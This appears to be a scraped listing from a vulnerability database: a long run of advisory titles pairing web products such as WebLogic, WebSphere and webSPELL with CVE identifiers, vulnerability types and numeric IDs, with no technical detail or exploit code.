CVE-2001-0374 Security Bypass Vulnerability [88716] Pi3web CVE-2002-0433 Remote Security Vulnerability [88708] Scriptease Webserver CVE-2002-0323 Remote Security Vulnerability [88677] Java System Web Proxy Server CVE-2005-4806 Denial-Of-Service Vulnerability [88676] Opera Web Browser CVE-2005-4718 Denial-Of-Service Vulnerability [88673] Weblogic Server CVE-2005-4705 Remote Security Vulnerability [88668] Weblogic Server CVE-2005-4704 Remote Security Vulnerability [88645] Iplanet Web Server CVE-2001-1368 Remote Security Vulnerability [88641] Netsuite Web Server CVE-2001-0275 Denial-Of-Service Vulnerability [88638] GoAhead WebServer CVE-2001-0228 Directory Traversal Vulnerability [88636] Phpwebsite CVE-2001-1363 Remote Security Vulnerability [88632] Website Pro CVE-1999-1180 Remote Security Vulnerability [88624] BiblioWeb Server CVE-2001-0227 Denial-Of-Service Vulnerability [88521] Note-A-Day Weblog CVE-2006-0404 Information Disclosure Vulnerability [88490] Weblogic Server CVE-2006-0419 Denial-Of-Service Vulnerability [88461] Weblogic Server CVE-2006-0420 Denial-Of-Service Vulnerability [88453] Icq Web Front CVE-2000-1078 Denial-Of-Service Vulnerability [88445] Web Server CVE-1999-1081 Remote Security Vulnerability [88433] Free Java Web Server CVE-2001-0186 Directory Traversal Vulnerability [88429] Spymac Web Os CVE-2005-3511 Cross-Site Scripting Vulnerability [88412] BiblioWeb Server CVE-2001-0226 Directory Traversal Vulnerability [88397] Falcon Web Server CVE-1999-0882 Remote Security Vulnerability [88381] Axwebremovectrl CVE-2005-3693 Remote Security Vulnerability [88376] Web-Based Enterprise Management CVE-1999-0982 Local Security Vulnerability [88309] Websitetool CVE-2000-0110 Remote Security Vulnerability [88283] Iplanet Web Server CVE-2000-0182 Denial-Of-Service Vulnerability [88223] WebTV for Windows 98 CVE-2000-0082 Remote Security Vulnerability [88135] Web Blog CVE-2006-0845 Remote Security Vulnerability [88115] Webdrive CVE-2006-0867 Denial-Of-Service Vulnerability [88107] V-webmail CVE-2006-0794 Remote Security Vulnerability [88033] Selena Sol Webstore CVE-1999-0604 Remote Security Vulnerability [88023] Webcart CVE-1999-0610 Remote Security Vulnerability [88009] WebCalendar CVE-2005-3984 SQL-Injection Vulnerability [87996] Secure Web Console CVE-1999-0829 Remote Security Vulnerability [87965] Roxen Web Server CVE-1999-1522 Remote Security Vulnerability [87852] Webcam32 CVE-1999-1292 Remote Security Vulnerability [87797] Backweb Client CVE-1999-1277 Local Security Vulnerability [87781] Webramp CVE-1999-1264 Remote Security Vulnerability [87761] Squid Web Proxy CVE-1999-1273 Remote Security Vulnerability [87739] Phpwebsite CVE-2003-0737 Remote Security Vulnerability [87737] Phpwebsite CVE-2003-0738 Denial-Of-Service Vulnerability [87726] WebNS CVE-2003-0677 Denial-Of-Service Vulnerability [87714] Weblogic Server CVE-2003-0640 Remote Security Vulnerability [87699] WebCalendar CVE-2006-1537 Information Disclosure Vulnerability [87696] Websphere Application Server CVE-2006-1619 Denial-Of-Service Vulnerability [87684] Apt-Webshop-System CVE-2006-1686 Remote Security Vulnerability [87681] Websense CVE-2006-2035 Local Security Vulnerability [87671] PhpWebGallery CVE-2006-2041 Remote Security Vulnerability [87661] Web+ Shop CVE-2006-1897 Information Disclosure Vulnerability [87653] Websphere Application Server CVE-2006-2429 Remote Security Vulnerability [87644] Websphere Application Server CVE-2006-2430 Remote Security Vulnerability [87642] Websphere Application Server CVE-2006-2434 Information Disclosure Vulnerability [87641] Websphere Application Server CVE-2006-2436 Remote Security Vulnerability [87639] Websphere Application Server CVE-2006-2435 Remote Security Vulnerability [87635] Websphere Application Server CVE-2006-2432 Remote Security Vulnerability [87624] Websphere Application Server CVE-2006-2433 Remote Security Vulnerability [87622] Weblogic Server CVE-2006-2466 Remote Security Vulnerability [87610] Weblogic Server CVE-2006-2469 Remote Security Vulnerability [87607] Weblogic Server CVE-2006-2462 Remote Security Vulnerability [87604] Weblogic Server CVE-2006-2546 Remote Security Vulnerability [87603] Weblogic Server CVE-2006-2470 Security Bypass Vulnerability [87602] Weblogic Server CVE-2006-2467 Remote Security Vulnerability [87600] Weblogic Server CVE-2006-2471 Information Disclosure Vulnerability [87599] Weblogic Server CVE-2006-2468 Information Disclosure Vulnerability [87598] Weblogic Server CVE-2006-2461 Remote Security Vulnerability [87597] Weblogic Server CVE-2006-2464 Local Security Vulnerability [87595] Weblogic Server CVE-2006-2472 Local Security Vulnerability [87588] Websphere Application Server CVE-2006-5324 Remote Security Vulnerability [87570] Websphere Application Server CVE-2006-5323 Remote Security Vulnerability [87547] Webglimpse CVE-2005-4354 Cross-Site Scripting Vulnerability [87542] PhpWebThings CVE-2005-4226 SQL-Injection Vulnerability [87516] Java System Web Server CVE-2009-3878 Remote Security Vulnerability [87503] WebSphere Business Events CVE-2009-2741 Remote Security Vulnerability [87472] Nweb2fax CVE-2008-6669 Remote Security Vulnerability [87468] Web File Explorer CVE-2009-1314 Remote Security Vulnerability [87435] iWeb Server CVE-2003-0475 Directory Traversal Vulnerability [87427] iWeb Server CVE-2003-0474 Directory Traversal Vulnerability [87390] Business Card Web Builder CVE-2006-5816 Remote Security Vulnerability [87380] Web Directory Pro CVE-2006-5905 Remote Security Vulnerability [87363] Web Mech Designer CVE-2006-5896 Remote Security Vulnerability [87361] Sap Web Application Server CVE-2006-6010 Information Disclosure Vulnerability [87358] Netwebadmin Enterprise CVE-2006-6239 Remote Security Vulnerability [87329] Sap Web Application Server CVE-2006-6011 Denial-Of-Service Vulnerability [87284] Websphere Host On-Demand CVE-2006-6537 Security Bypass Vulnerability [87254] Atmail Webmail CVE-2006-6701 Cross-Site Request Forgery Vulnerability [87221] Wallpaper Complete Website CVE-2006-6215 SQL-Injection Vulnerability [87202] Seleniumserver Web Server CVE-2006-6124 Cross-Site Scripting Vulnerability [87181] Helm Web Hosting Control Panel CVE-2006-5984 Cross-Site Scripting Vulnerability [87151] Wsmp3 Web Server CVE-2003-0338 Directory Traversal Vulnerability [87148] Snowblind Web Server CVE-2003-0312 Directory Traversal Vulnerability [87140] Snowblind Web Server CVE-2003-0313 Directory Traversal Vulnerability [87128] Snowblind Web Server CVE-2003-0315 Denial-Of-Service Vulnerability [87104] Webhost Directory CVE-2006-6819 Information Disclosure Vulnerability [87101] Webhost Directory CVE-2006-6817 Information Disclosure Vulnerability [87078] FreeWebshop CVE-2006-6941 Information Disclosure Vulnerability [87077] Opera Web Browser CVE-2006-6970 Security Bypass Vulnerability [87068] Opera Web Browser CVE-2006-6955 Denial-Of-Service Vulnerability [87063] Direct Web Remoting CVE-2006-6916 Denial-Of-Service Vulnerability [87008] Myweb4net Browser CVE-2006-6983 Remote Security Vulnerability [86998] GroupWise WebAccess CVE-2001-1233 Remote Security Vulnerability [86977] Webgui CVE-2006-0165 Cross-Site Scripting Vulnerability [86933] Helm Web Hosting Control Panel CVE-2005-4747 Cross-Site Scripting Vulnerability [86921] Rt Internet Solutions Webadmin CVE-2005-4669 SQL-Injection Vulnerability [86912] Slwebmail CVE-2003-0267 Remote Security Vulnerability [86907] Acweb CVE-2002-2421 Denial-Of-Service Vulnerability [86896] Slwebmail CVE-2003-0268 Remote Security Vulnerability [86889] Slwebmail CVE-2003-0266 Denial-Of-Service Vulnerability [86864] Websphere Application Server CVE-2006-7164 Information Disclosure Vulnerability [86814] Websphere Application Server CVE-2006-7198 Remote Security Vulnerability [86801] Webulas CVE-2007-0154 Information Disclosure Vulnerability [86731] FreeWebshop CVE-2007-0531 Remote Security Vulnerability [86720] Neon Labs Website CVE-2007-0496 Remote Security Vulnerability [86673] 04Webserver CVE-2002-2216 Information Disclosure Vulnerability [86671] Secure Web Server For Tru64 CVE-2002-2264 Denial-Of-Service Vulnerability [86638] Web Security CVE-2007-0564 Denial-Of-Service Vulnerability [86629] Webbuilder CVE-2007-0703 Remote Security Vulnerability [86608] Jportal Web Server CVE-2007-0912 Cross-Site Request Forgery Vulnerability [86593] J-Web Pics Navigator CVE-2007-1143 Directory Traversal Vulnerability [86581] webSPELL CVE-2007-1160 Security Bypass Vulnerability [86573] WebAPP CVE-2007-1259 Remote Security Vulnerability [86570] webSPELL CVE-2007-1155 File-Upload Vulnerability [86531] Java System Web Server CVE-2007-1526 Remote Security Vulnerability [86528] WebAPP CVE-2007-1489 Cross-Site Request Forgery Vulnerability [86402] Typolight Webcms CVE-2007-1632 Remote Security Vulnerability [86398] Opera Web Browser CVE-2007-1737 Security Bypass Vulnerability [86373] WebAPP CVE-2007-1829 Remote Security Vulnerability [86359] WebAPP CVE-2007-1831 Remote Security Vulnerability [86357] WebAPP CVE-2007-1832 Remote Security Vulnerability [86354] Web Php CVE-2007-1957 Remote Security Vulnerability [86333] Webslider CVE-2007-2067 Remote Security Vulnerability [86264] Selena Sol Webstore CVE-1999-0604 Remote Security Vulnerability [86260] Webcart CVE-1999-0610 Remote Security Vulnerability [86233] Webspeed Messenger CVE-2007-2354 Information Disclosure Vulnerability [86232] NaviCOPA Web Server CVE-2007-2336 Denial-Of-Service Vulnerability [86231] Direct Web Remoting CVE-2007-2377 Denial-Of-Service Vulnerability [86228] Web Toolkit CVE-2007-2378 Denial-Of-Service Vulnerability [86220] webSPELL CVE-2007-2368 Remote Security Vulnerability [86180] Weblog CVE-2007-2574 Denial-Of-Service Vulnerability [86172] Weblogic Server CVE-2007-2701 Security Bypass Vulnerability [86169] Weblogic Server CVE-2007-2699 File-Upload Vulnerability [86166] Weblogic Server CVE-2007-2695 Remote Security Vulnerability [86159] WebLogic Workshop CVE-2007-2705 Directory Traversal Vulnerability [86158] Weblogic Server CVE-2007-2696 Remote Security Vulnerability [86157] Webgui CVE-2007-2746 Information Disclosure Vulnerability [86155] Weblogic Server CVE-2007-2697 Denial-Of-Service Vulnerability [86154] Weblogic Server CVE-2007-2700 Information Disclosure Vulnerability [86149] Weblogic Server CVE-2007-2698 Remote Security Vulnerability [86147] Web Intelligence CVE-2007-2689 Remote Security Vulnerability [86145] Weblogic Server CVE-2007-2704 Denial-Of-Service Vulnerability [86143] WebLogic Portal CVE-2007-2703 Remote Security Vulnerability [86131] Webavis CVE-2007-2943 Remote Security Vulnerability [86121] Web Directory CVE-2007-2979 Information Disclosure Vulnerability [86101] Image Gallery Web Application CVE-2007-3229 Information Disclosure Vulnerability [86081] PhpWebThings CVE-2007-3141 Remote Security Vulnerability [86080] Comdev Web Blogger CVE-2007-3084 Remote Security Vulnerability [86079] Websphere Portal CVE-2007-3127 Information Disclosure Vulnerability [85978] IBM WebSphere Application Server CVE-2016-0306 Information Disclosure Vulnerability [85861] Eaton Lighting Systems EG2 Web Control Security Bypass and Information Disclosure Vulnerabilities [85765] ICONICS WebHMI CVE-2016-2289 Directory Traversal Vulnerability [85688] WebAPP CVE-2007-3424 Remote Security Vulnerability [85687] WebAPP CVE-2007-3423 Remote Security Vulnerability [85685] WebAPP CVE-2007-3422 Remote Security Vulnerability [85683] WebAPP CVE-2007-3421 Remote Security Vulnerability [85673] WebAPP CVE-2007-3420 Remote Security Vulnerability [85670] WebAPP CVE-2007-3419 Remote Security Vulnerability [85667] SerWeb CVE-2007-3359 Remote Security Vulnerability [85663] WebAPP CVE-2007-3418 Remote Security Vulnerability [85654] Webapp CVE-2007-3416 Cross-Site Request Forgery Vulnerability [85563] Java System Web Server CVE-2006-5654 Denial-Of-Service Vulnerability [85524] Stampit Web CVE-2007-3871 Denial-Of-Service Vulnerability [85508] Webbler CMS CVE-2007-4072 Information Disclosure Vulnerability [85498] Webbler CMS CVE-2007-4073 Remote Security Vulnerability [85497] Websphere Application Server CVE-2007-3960 Remote Security Vulnerability [85441] Weblogic Server CVE-2007-4617 Denial-Of-Service Vulnerability [85418] Websphere Application Server CVE-2007-4839 Remote Security Vulnerability [85360] Opera Web Browser CVE-2007-4944 Information Disclosure Vulnerability [85345] Webmedia Explorer CVE-2007-4948 Remote Security Vulnerability [85340] Xkiosk Web CVE-2007-5314 Remote Security Vulnerability [85315] Opera Web Browser CVE-2007-5276 Remote Security Vulnerability [85247] WebLogic Mobility Server CVE-2007-6384 Remote Security Vulnerability [85230] GoAhead WebServer CVE-2007-6702 Remote Security Vulnerability [85224] Webgui CVE-2007-6487 Remote Security Vulnerability [85218] Websphere Application Server CVE-2007-6679 Remote Security Vulnerability [85208] IBM Security Access Manager for Web CVE-2015-5010 Information Disclosure Vulnerability [85206] IBM Security Access Manager for Web CVE-2015-5012 Information Disclosure Vulnerability [85189] FreeWebshop CVE-2007-6711 Remote Security Vulnerability [85177] Weblaunch CVE-2008-0221 Directory Traversal Vulnerability [85173] WebSphere MQ CVE-2007-6705 Local Security Vulnerability [85160] webSPELL CVE-2008-0575 Cross-Site Request Forgery Vulnerability [85127] WebLogic Portal CVE-2008-0870 Remote Security Vulnerability [85126] Weblogic Server CVE-2008-0898 Security Bypass Vulnerability [85124] Weblogic Server CVE-2008-0863 Information Disclosure Vulnerability [85122] Weblogic Server CVE-2008-0897 Security Bypass Vulnerability [85120] Weblogic Server CVE-2008-0901 Remote Security Vulnerability [85116] WebLogic Portal CVE-2008-0865 Security Bypass Vulnerability [85113] WebLogic Portal CVE-2008-0896 Security Bypass Vulnerability [85111] Weblogic Server CVE-2008-0900 Remote Security Vulnerability [85110] Weblogic Server CVE-2008-0895 Security Bypass Vulnerability [85109] WebLogic Portal CVE-2008-0864 Security Bypass Vulnerability [85105] Weblogic Server CVE-2008-0903 Denial-Of-Service Vulnerability [85091] Prost Web Management CVE-2008-1543 Remote Security Vulnerability [85089] IBM Business Process Manager Advanced and WebSphere Process Server Security Bypass Vulnerability [85069] WebKit Multiple Security Vulnerabilities [85063] WebKit CVE-2016-1780 Information Disclosure Vulnerability [85062] WebKit Multiple Unspecified Memory Corruption and Denial of Service Vulnerabilities [85043] WorkSite Web CVE-2008-1700 Denial-Of-Service Vulnerability [85011] Websphere Application Server CVE-2008-2550 Remote Security Vulnerability [84965] Snowblind Web Server CVE-2003-0314 Denial-Of-Service Vulnerability [84946] IBM WebSphere Application Server CVE-2016-0283 Cross Site Scripting Vulnerability [84937] V-webmail CVE-2008-3061 Remote Security Vulnerability [84925] V-webmail CVE-2008-3060 Information Disclosure Vulnerability [84913] Web Wiz Forum CVE-2008-3392 Cross-Site Request Forgery Vulnerability [84903] Websphere Application Server CVE-2008-3236 Information Disclosure Vulnerability [84826] Websphere Application Server CVE-2008-4285 Denial-Of-Service Vulnerability [84824] Opera Web Browser CVE-2008-4292 Remote Security Vulnerability [84803] Comdev Web Blogger CVE-2006-5441 Remote Security Vulnerability [84794] Websphere Application Server CVE-2006-5324 Remote Security Vulnerability [84791] Nuralstorm Webmail CVE-2006-5386 Remote Security Vulnerability [84788] Websphere Application Server CVE-2006-5323 Remote Security Vulnerability [84773] PhpWebGallery CVE-2008-4702 File-Upload Vulnerability [84765] Sports Clubs Web Portal CVE-2008-4592 File-Upload Vulnerability [84730] Webcards CVE-2008-4878 File-Upload Vulnerability [84676] Secure Web Gateway CVE-2008-5540 Security Bypass Vulnerability [84638] Webmail CVE-2008-5620 Denial-Of-Service Vulnerability [84624] Webboard CVE-2008-5956 Information Disclosure Vulnerability [84620] Discussion Web CVE-2008-5886 Information Disclosure Vulnerability [84607] FactoSystem Weblog CVE-2008-5935 Information Disclosure Vulnerability [84412] Opera Web Browser CVE-2008-7245 Denial-Of-Service Vulnerability [84323] IBM WebSphere Commerce CVE-2016-0208 Denial of Service Vulnerability [84203] Neon Webmail CVE-2006-4954 Remote Security Vulnerability [84202] Neon Webmail CVE-2006-4952 Remote Security Vulnerability [84199] Neon Webmail CVE-2006-4955 Multiple Directory Traversal Vulnerabilities [84198] Neon Webmail CVE-2006-4951 Remote Security Vulnerability [84151] Web Server Creator CVE-2006-4746 Remote Security Vulnerability [84004] PhpWebGallery CVE-2006-1600 SQL-Injection Vulnerability [83994] Apt-Webshop-System CVE-2006-1687 Cross-Site Scripting Vulnerability [83991] Web Conferencing Pro CVE-2006-1474 Cross-Site Scripting Vulnerability [83985] PhpWebGallery CVE-2006-1674 Cross-Site Scripting Vulnerability [83954] Open Webmail CVE-2006-2190 Cross-Site Scripting Vulnerability [83941] Myweb Portal Office CVE-2006-2517 SQL-Injection Vulnerability [83936] Cisco Web Security Appliance CVE-2016-1288 Denial of Service Vulnerability [83928] Spymac Web Os CVE-2006-2488 Cross-Site Scripting Vulnerability [83889] Webhost Directory CVE-2006-2618 Cross-Site Scripting Vulnerability [83888] Webhost Directory CVE-2006-2616 SQL-Injection Vulnerability [83880] Webhost Directory CVE-2006-2617 SQL-Injection Vulnerability [83840] Cabacos Web Cms CVE-2006-2963 Cross-Site Scripting Vulnerability [83747] Webex Downloader Activex Control CVE-2006-3424 Remote Security Vulnerability [83722] IBM WebSphere Portal CVE-2015-7491 Unspecified Cross Site Scripting Vulnerability [83685] iWebNegar CVE-2006-4496 Cross-Site Scripting Vulnerability [83637] webSPELL CVE-2006-4783 SQL-Injection Vulnerability [83634] IBM WebSphere DataPower XC10 Appliance CVE-2015-7418 Local Information Disclosure Vulnerability [83622] FreeWebshop CVE-2006-5772 SQL-Injection Vulnerability [83558] Mini Web Server CVE-2007-0525 Remote Security Vulnerability [83529] WebAPP CVE-2007-1827 Remote Security Vulnerability [83509] IBM WebSphere Portal CVE-2015-7455 Security Bypass Vulnerability [83500] IBM WebSphere Portal CVE-2016-0244 Unspecified Cross Site Scripting Vulnerability [83494] IBM WebSphere Portal CVE-2015-7457 Unspecified Cross Site Scripting Vulnerability [83488] IBM WebSphere Portal CVE-2016-0243 Unspecified Cross Site Scripting Vulnerability [83485] IBM WebSphere CVE-2016-0245 Portal XML External Entity Denial of Service Vulnerability [83479] IBM WebSphere Portal CVE-2015-7428 Unspecified Open Redirection Vulnerability [83418] Zimbra Mail interface CVE-2015-6541 Cross Site Request Forgery Vulnerability [83413] Webgui CVE-2006-0165 Cross Site Scripting Vulnerability [83393] WebSVN CVE-2016-2511 Cross Site Scripting Vulnerability [83293] RETIRED: Cisco Adaptive Security Appliance WebVPN Portal Cross Site Scripting Vulnerability [83279] IBM WebSphere Commerce CVE-2016-0225 Information Disclosure Vulnerability [83237] Websphere Application Server CVE-2006-4222 Remote Security Vulnerability [83233] Websphere Application Server CVE-2006-4223 Information Disclosure Vulnerability [83231] Tinywebgallery CVE-2006-4166 Remote Security Vulnerability [83230] Webinsta Cms CVE-2006-4217 Remote Security Vulnerability [83090] Advantech WebAccess Multiple Stack Buffer Overflow Vulnerabilities [83083] NCSA WebServer CVE-1999-0232 Remote Security Vulnerability [83080] Advantech WebAccess Multiple Stack Buffer Overflow Vulnerabilities [83072] Ncsa Web Server CVE-1999-0235 Remote Security Vulnerability [83055] Advantech WebAccess Multiple Heap Buffer Overflow Vulnerabilities [83040] Third Voice Web CVE-1999-1167 Cross-Site Scripting Vulnerability [83020] Advantech WebAccess Multiple Stack Buffer Overflow Vulnerabilities [82992] IBM WebSphere MQ CVE-2015-2012 Local Information Disclosure Vulnerability [82977] Web File Explorer CVE-2009-1314 Remote Security Vulnerability [82965] eTrust Antivirus WebScan CVE-2006-3977 Remote Security Vulnerability [82949] IBM WebSphere Commerce CVE-2015-7444 Local Information Disclosure Vulnerability [82886] Web Search CVE-2002-0530 Cross-Site Scripting Vulnerability [82862] Web Mail CVE-2002-1899 Cross-Site Scripting Vulnerability [82854] WebRamp 200i CVE-1999-0438 Denial-Of-Service Vulnerability [82830] Portail Web Php CVE-2002-2278 Cross-Site Scripting Vulnerability [82815] Webramp CVE-1999-0437 Denial-Of-Service Vulnerability [82814] Activwebserver CVE-2002-2189 Cross-Site Scripting Vulnerability [82784] Affordable Web Space Design Webbbs CVE-2003-0479 Cross-Site Scripting Vulnerability [82779] Wsmp3 Web Server CVE-2003-0339 Remote Security Vulnerability [82724] Phpwebsite CVE-2003-0735 SQL-Injection Vulnerability [82720] Phpwebsite CVE-2003-0736 Cross-Site Scripting Vulnerability [82711] FoxWeb CVE-2003-0762 Remote Security Vulnerability [82702] Webexpert CVE-2003-1586 Cross-Site Scripting Vulnerability [82690] WebSTAR CVE-2004-0695 Remote Security Vulnerability [82689] WebLog Expert CVE-2003-1585 Cross-Site Scripting Vulnerability [82685] Webtrends Log Analyzer CVE-2003-1583 Cross-Site Scripting Vulnerability [82684] ONE Web Server CVE-2003-1577 Cross-Site Scripting Vulnerability [82682] Microsoft Windows WebDAV CVE-2016-0051 Local Privilege Escalation Vulnerability [82677] Webzedit CVE-2004-0314 Cross-Site Scripting Vulnerability [82591] pgn2web CVE-2004-1290 Remote Security Vulnerability [82578] Forum Web Server CVE-2004-2346 Cross-Site Scripting Vulnerability [82572] Phpwebsite CVE-2004-2322 SQL-Injection Vulnerability [82548] IBM Webshphere Portal CVE-2015-7472 Unspecified LDAP Injection Vulnerability [82502] IBM WebSphere Business Events CVE-2009-2741 Remote Security Vulnerability [82452] Backweb Polite Agent Protocol CVE-1999-0395 Remote Security Vulnerability [82450] Cisco WebEx Meetings Server CVE-2016-1309 Multiple Cross Site Scripting Vulnerabilities [82434] WebCalendar CVE-2005-0474 SQL-Injection Vulnerability [82408] Sauter moduWeb Vision Multiple Security Vulnerabilities [82356] Java System Web Proxy Server CVE-2005-1232 Remote Security Vulnerability [82354] Webcamxp Pro CVE-2005-1189 Cross-Site Scripting Vulnerability [82337] Java System Web Server CVE-2009-3878 Remote Security Vulnerability [82243] Multiple WEBSQUARE JOB-CUBE Products CVE-2016-1144 Unspecified Cross Site Scripting Vulnerability [82188] WebHost Manager CVE-2006-6548 Cross-Site Scripting Vulnerability [82172] Atmail Webmail System CVE-2006-6700 Cross-Site Scripting Vulnerability [82152] Atmail Webmail CVE-2006-6702 Cross-Site Scripting Vulnerability [82149] Atmail Webadmin CVE-2006-6704 Cross-Site Scripting Vulnerability [82098] Metaweb CVE-1999-0268 Remote Security Vulnerability [82094] Java Web Server CVE-1999-0283 Remote Security Vulnerability [82068] MIMEsweeper For Web CVE-2006-3523 Denial-Of-Service Vulnerability [82041] com_weblinks CVE-2006-7247 SQL-Injection Vulnerability [82015] Simple Web Cms CVE-2007-0093 SQL-Injection Vulnerability [82008] Cisco Unity Connection Web Framework CVE-2016-1300 Cross Site Scripting Vulnerability [81988] webSPELL CVE-2007-0492 SQL-Injection Vulnerability [81971] WebFORM CVE-2007-0547 Cross-Site Scripting Vulnerability [81935] webSPELL CVE-2007-1154 SQL-Injection Vulnerability [81919] Online Web Building CVE-2007-1058 SQL-Injection Vulnerability [81910] WebTester CVE-2007-0970 SQL-Injection Vulnerability [81897] WebAPP CVE-2007-1177 Cross-Site Scripting Vulnerability [81892] WebAPP CVE-2007-1175 Cross-Site Scripting Vulnerability [81882] WebAPP CVE-2007-1176 Cross-Site Scripting Vulnerability [81881] Bj Webring CVE-2007-1328 Cross-Site Scripting Vulnerability [81847] Ewebquiz CVE-2007-1706 SQL-Injection Vulnerability [81837] WebAPP CVE-2007-1830 Cross-Site Scripting Vulnerability [81830] Ripe Website Manager CVE-2007-2207 SQL-Injection Vulnerability [81827] My Little Weblog CVE-2007-2102 Cross-Site Scripting Vulnerability [81825] WebAPP CVE-2007-1828 Cross-Site Scripting Vulnerability [81807] Roundcube Webmail CVE-2015-8770 Directory Traversal Vulnerability [81796] Weblogic Server CVE-2007-2694 Cross-Site Scripting Vulnerability [81786] WebLogic Portal CVE-2007-2702 Cross-Site Scripting Vulnerability [81749] IBM WebSphere Portal CVE-2016-0209 Unspecified Cross Site Scripting Vulnerability [81738] IBM WebSphere Application Server CVE-2015-7417 Cross Site Scripting Vulnerability [81717] WebAPP CVE-2007-3417 Cross-Site Scripting Vulnerability [81712] Websphere Application Server CVE-2007-3265 Cross-Site Scripting Vulnerability [81674] WebCit CVE-2007-3822 Cross-Site Scripting Vulnerability [81618] Webbler CMS CVE-2007-4071 Cross-Site Scripting Vulnerability [81599] Ripe Website Manager CVE-2007-4523 Cross-Site Scripting Vulnerability [81598] Web Control Panel CVE-2007-4589 Cross-Site Scripting Vulnerability [81586] GroupWise WebAccess CVE-2007-4557 Cross-Site Scripting Vulnerability [81531] Webdoc Cms CVE-2007-6491 SQL-Injection Vulnerability [81528] Jportal Web Portal CVE-2007-5974 SQL-Injection Vulnerability [81497] Java System Web Server CVE-2007-6572 Cross-Site Scripting Vulnerability [81490] WebPortal CMS CVE-2008-0142 SQL-Injection Vulnerability [81485] Java System Web Server CVE-2007-6571 Cross-Site Scripting Vulnerability [81479] Java System Web Server CVE-2007-6570 Cross-Site Scripting Vulnerability [81434] Cisco Web Security Appliance CVE-2016-1296 Remote Security Bypass Vulnerability [81414] WebLogic Workshop CVE-2008-0866 Cross-Site Scripting Vulnerability [81410] WebLogic Portal CVE-2008-0868 Cross-Site Scripting Vulnerability [81409] Weblogic Server CVE-2008-0902 Cross-Site Scripting Vulnerability [81401] Weblogic Server CVE-2008-0869 Cross-Site Scripting Vulnerability [81398] Weblogic Server CVE-2008-0899 Cross-Site Scripting Vulnerability [81385] Advanced Web Photo Gallery CVE-2008-1711 SQL-Injection Vulnerability [81341] Web Group Communication Center CVE-2008-2446 SQL-Injection Vulnerability [81324] Smeweb CVE-2008-2652 SQL-Injection Vulnerability [81309] Weblosning CVE-2008-2506 SQL-Injection Vulnerability [81263] WebKit Multiple Security Vulnerabilities [81039] WebChamado CVE-2008-2858 SQL-Injection Vulnerability [81030] WebMatic CVE-2008-2925 SQL-Injection Vulnerability [81022] Galatolo Webmanager CVE-2008-2700 SQL-Injection Vulnerability [81005] Academic Web Tools CVE-2008-2968 SQL-Injection Vulnerability [80998] CentreWare Web CVE-2008-3122 SQL-Injection Vulnerability [80996] Academic Web Tools CVE-2008-2967 Cross-Site Scripting Vulnerability [80995] V-webmail CVE-2008-3063 SQL-Injection Vulnerability [80968] Groupware Webmail Edition CVE-2008-3650 Cross-Site Scripting Vulnerability [80949] Webcms Portal Edition CVE-2008-4185 SQL-Injection Vulnerability [80948] Webcms Portal Edition CVE-2008-4186 SQL-Injection Vulnerability [80924] IBM WebSphere Commerce CVE-2015-5009 HTML Injection Vulnerability [80919] IBM WebSphere Commerce CVE-2015-5008 Cross Site Scripting Vulnerability [80858] PhpWebGallery CVE-2008-4591 Cross-Site Scripting Vulnerability [80834] Opera Web Browser CVE-2008-4725 Cross-Site Scripting Vulnerability [80785] Cms Isweb CVE-2008-5934 SQL-Injection Vulnerability [80784] WebStudio CMS CVE-2008-5336 SQL-Injection Vulnerability [80782] WebTransactions CVE-2008-5842 Cross-Site Scripting Vulnerability [80778] Phpclanwebsite CVE-2008-5879 Cross-Site Scripting Vulnerability [80777] Galatolo Webmanager CVE-2008-6108 Cross-Site Scripting Vulnerability [80769] PHP JOBWEBSITE PRO CVE-2008-5977 SQL-Injection Vulnerability [80766] Multi Languages Webshop Online CVE-2008-6268 SQL-Injection Vulnerability [80762] Galatolo Webmanager CVE-2008-6249 SQL-Injection Vulnerability [80745] Advantech WebAccess ICSA-16-014-01 Multiple Security Vulnerabilities [80741] Juniper Junos J-Web CVE-2016-1258 Remote Denial of Service Vulnerability [80723] WebShop CVE-2008-6627 SQL-Injection Vulnerability [80709] Active Web Mail CVE-2008-6873 SQL-Injection Vulnerability [80680] Openwebmail CVE-2008-7202 Cross-Site Scripting Vulnerability [80676] Webid CVE-2008-7117 Cross-Site Scripting Vulnerability [80671] Webid CVE-2008-7119 SQL-Injection Vulnerability [80670] Aspwebalbum CVE-2008-6977 Cross-Site Scripting Vulnerability [80622] Websphere Application Server CVE-2009-0856 Cross-Site Scripting Vulnerability [80573] Hutscripts Php Website Script CVE-2009-2590 SQL-Injection Vulnerability [80559] Hutscripts Php Website Script CVE-2009-2589 Cross-Site Scripting Vulnerability [80558] Websphere Application Server CVE-2009-2087 Denial-Of-Service Vulnerability [80554] Opera Web Browser CVE-2009-3013 Cross-Site Scripting Vulnerability [80533] Web Wiz Guestbook CVE-2003-1571 Information Disclosure Vulnerability [80531] ONE Web Server CVE-2003-1589 Denial Of Service Vulnerability [80522] ONE Web Server CVE-2003-1590 Denial Of Service Vulnerability [80515] ONE Web Server CVE-2003-1579 Remote Security Vulnerability [80505] QtWeb CVE-2009-3015 Cross-Site Scripting Vulnerability [80474] Miniweb CVE-2009-3420 Cross-Site Scripting Vulnerability [80469] Opera Web Browser CVE-2009-3265 Cross-Site Scripting Vulnerability [80396] Website CVE-1999-0177 Remote Security Vulnerability [80349] IBM WebSphere Commerce CVE-2015-5007 Unspecified Cross Site Request Forgery Vulnerability [80348] IBM WebSphere Commerce CVE-2015-7397 Open Redirection Vulnerability [80319] Fiery Webtools CVE-2009-3913 SQL-Injection Vulnerability [80312] Miniweb CVE-2009-4552 Cross-Site Scripting Vulnerability [80299] Com Webeecomment CVE-2009-4651 Cross-Site Scripting Vulnerability [80290] WebMatic CVE-2009-4380 SQL-Injection Vulnerability [80269] WebStatCaffe CVE-2009-4718 SQL-Injection Vulnerability [80251] Ezwebsearch CVE-2009-4716 Cross-Site Scripting Vulnerability [80229] Websense Web Filter CVE-2009-5120 Cross-Site Scripting Vulnerability [80202] Webadmin CVE-2003-1463 Directory Traversal Vulnerability [80163] Webwork CVE-2006-2839 Directory Traversal Vulnerability [80159] aspWeblinks CVE-2006-2848 Remote Security Bypass Vulnerability [80104] Webnetwork CVE-2012-4352 Cross-Site Scripting Vulnerability [80093] Websphere Portal CVE-2014-6171 Cross-Site Scripting Vulnerability [80090] Websphere Datapower Xc10 Appliance Firmware CVE-2014-6163 Cross-Site Scripting Vulnerability [80078] Security Access Manager for Web CVE-2014-6080 SQL-Injection Vulnerability [80047] Voice Of Web Allmyguests CVE-2014-8293 Cross-Site Scripting Vulnerability [80046] Voice Of Web Allmyguests CVE-2014-8294 SQL-Injection Vulnerability [80038] Bacula-Web CVE-2014-8295 SQL-Injection Vulnerability [80016] 